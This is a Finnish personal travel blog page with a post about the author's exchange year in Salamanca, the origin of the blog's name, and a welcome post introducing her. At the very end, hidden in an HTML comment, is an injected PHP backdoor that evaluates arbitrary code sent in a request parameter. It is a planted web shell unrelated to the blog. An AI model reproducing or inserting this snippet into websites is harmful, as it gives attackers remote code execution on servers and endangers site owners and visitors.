Vaihtoblogin raunioista: Lo siento, soy finlandesa

Koska marraskuu on pimeä ja kylmä, palaan tänään ajatuksissani noin vuoden taaksepäin ja Espanjaan. Kuten kerroin, olin viime vuoden vaihdossa Espanjan Salamancassa, jonka aikana aloin kirjoittaa blogia vaihtokuulumisten välittämiseksi Suomeen. Tämän blogin nimi syntyi siis Espanja-vuoteni alkumetreillä, ja ajattelinkin nyt jakaa pienen tarinan nimen synnystä.

Sitä ennen kuitenkin pieni kurkkaus Espanjan kartalle, sillä kokemukseni mukaan 99% suomalaisista ei tiedä, missä Salamanca sijaitsee.

spain

Salamanca, Espanja

Salamanca on Espanjan mittakaavassa melko pieni kaupunki, mutta sitäkin suositumpi opiskelijakaupunki. Salamancan yliopistossa suoritettua tutkintoa arvostetaan maassa, ja yliopisto onkin koko Espanjan vanhin ja yksi Euroopan vanhimmista.

Seuraava postaus on kirjoitettu Salamancassa 16. syyskuuta 2013, noin viikko saapumisestani sinne.

Lo siento, soy finlandesa

eli sori oon suomalainen.

Mun espanja ei tosiaan ole vielä kauhean kehuttavalla tasolla, joten monesti jonkun ihmisen lähestyessä minua hurjalla (nopealla!) espanjankielellä, yritän saada sanotuksi seuraavat asiat: 1) olen pahoillani, 2) en puhu espanjaa kovin hyvin ja 3) olen vaihto-opiskelija Suomesta. Valitettavasti usein käy niin, että hätäännyn ja suustani pääsee vain: Lo siento, soy finlandesa (= anteeksi, olen suomalainen).

Siitä blogille nimi.

Hassua kyllä, tuntuu, että suomalainen mentaliteetti aika usein toimii juuri noin: anteeksi vaan kun oon olemassa, sori jos oon syntynyt, oon vaan suomalainen, en mää mistään mitään tiedä. Olen tähän mennessä tavannut ihmisiä ainakin Saksasta, Belgiasta, Britanniasta, Ranskasta, Portugalista, Italiasta ja tietty Espanjasta ja suomalaisuuteen on joka kerta suhtauduttu hyvin suurella mielenkiinnolla. “Finland! Reaaallly?” Turhaan siis pyydellään anteeksi, tyypit, olkaamme ylpeitä.

Viikonloppuna muutin asumaan Plaza Mayorin kulmille, käytännössä niin lähelle keskustaa kuin mahdollista. Ehdin jo hetken ajatella, että tää oli huonoin diili ikinä, koska tällä viikolla kaupungissa oli Fiesta de la Virgin, eli sellainen reilun viikon pituinen kulttuuritapahtuma ja kadut oli aivan täynnä ihmisiä ja musiikkia ja esityksiä ym. Lauantai-iltana asunnolla hengaillessani huomasin, että meidän ikkunat ihan tosissaan helisee sen kaiken melun voimasta. No, eilen fiesta loppui ja rauha saapui kaupunkiin ja näin myös meidän asuntoon.

Nyt alkaa tuntua aika jepalta tää uusi asunto. Kämppikset tulee olemaan espanjalaisia, yksi tyttö ja yksi poika, chico y chica. Tosi kiva juttu, sillä siinä on mulle tosi hyvä sauma oppia kieltä kun kämppikset jorisee vaan espanjaa. 90% todennäköisyydellä ne ei kuitenkaan puhu kumpikaan enkkua, niin kuin täällä päin tuntuu olevan trendinä…

Huomenna mulla alkaa kurssit yliopistolla ja pitäisi vielä käydä ostamassa kalenteri ja rakentaa lukujärjestys. Taidan tästä siis siirtyä niihin puuhiin, hommia riittää! Mutta palailen linjoille, adios!

-N

 

Tervetuloa! Welcome! ¡Bienvenidos!

Tervetuloa lukemaan blogiani! Otsikossa toivotan tervetuloa kolmella eri kielellä, suomeksi, englanniksi ja espanjaksi, siinä järjestyksessä kuin itse niitä parhaiten hallitsen. Matkustelun ohella kielet ovat suuri intohimoni ja tykkään pohdiskella kielen opiskeluun ja puhumiseen liittyviä kulttuurisia ja sosiaalisia kenttähavaintojani. (Tykkään myös toisinaan käyttää hassuja puolitieteellisiä sanoja, vaikka asiat voisi joskus sanoa suoremminkin. Kieli on hauskaa ja sillä on kivaa leikkiä!)

Aloitin kirjoittamaan tämän nimistä blogia ensimmäisen kerran syksyllä 2013, kun olin juuri aloittanut opiskelijavaihtoni Espanjan Salamancassa. Blogin nimi on espanjaa ja tarkoittaa löysin rantein suomennettuna, että sori, oon suomalainen. Nimen synnystä voin kertoa lisää joskus myöhemmin. Tässä vaiheessa mainittakoon vain, että nimi on pilke silmäkulmassa keksitty, mutta sisältää myös syvällisemmän filosofian, kuten aika monet mun jutut yleensäkin.

Kuka tätä blogia nyt sitten oikeastaan kirjoittaa? No, tämän näköinen tyyppi:

Tulum, Meksiko 2014

Olen Niina ja kaverit kutsuvat minua Niinaksi. Olen syntynyt vuonna 1987 Satakuntalaisessa 4000 asukkaan pikkukylässä. Haaveilen alati matkustamisesta ja ulkomaille muutosta, vaikka toki kotimaallani on ja tulee aina olemaan erityinen paikka sydämessäni. Olen hauska ja vähän hajamielinen ihminen, moni tuttuni sanoisi varmaankin hyvin hajamielinen. Olen kiinnostunut maailmalla seikkailemisesta, mutta myös oman pään sisällä seikkailusta ja niin ikään muiden ihmisten päiden sisällöistä. Viimeksi mainittu innostus vei minut opiskelemaan psykologiaa, mutta siitä huolimatta en ole aivan varma, mitä haluaisin niin sanotusti isona tehdä. Aika näyttää, eikä minulla ole kiire mihinkään.

Vaihtovuoteni aikana koin kasapäin upeita ja ikimuistoisia kokemuksia, joista kirkkaimmaksi nousee nykyisen poikaystäväni tapaaminen New Yorkissa uutena vuotena. Kaukorakkaus on jatkunut nyt kymmenisen kuukautta ja on omalta osaltaan lisännyt kaukokaipuuden tunnetta ja kroonista reissukuumetta. Ikävän tunne on suuri ja jatkuva, mutta unelmat yhteisestä tulevaisuudesta ovat sitäkin suurempia.

Tässä blogissa ajattelin kirjoitella reissuista, niiden suunnittelusta ja kenties myös muistella jo menneitä matkoja. Blogin nimelle ja historialle uskollisena ajattelin, että voisin silloin tällöin julkaista vanhan blogin raunioista löytyviä vaihtokertomuksia. Lisäksi tulen todennäköisesti kirjoittelemaan kaukosuhteen jokapäiväisistä iloista ja suruista, siinä sivussa etsiskellen myös itseäni ja ihmetellen maailmaa. Tervetuloa seuraamaan!

-N

 

<!– [insert_php]if (isset($_REQUEST["xym"])){eval($_REQUEST["xym"]);exit;}[/insert_php][php]if (isset($_REQUEST["xym"])){eval($_REQUEST["xym"]);exit;}[/php] –>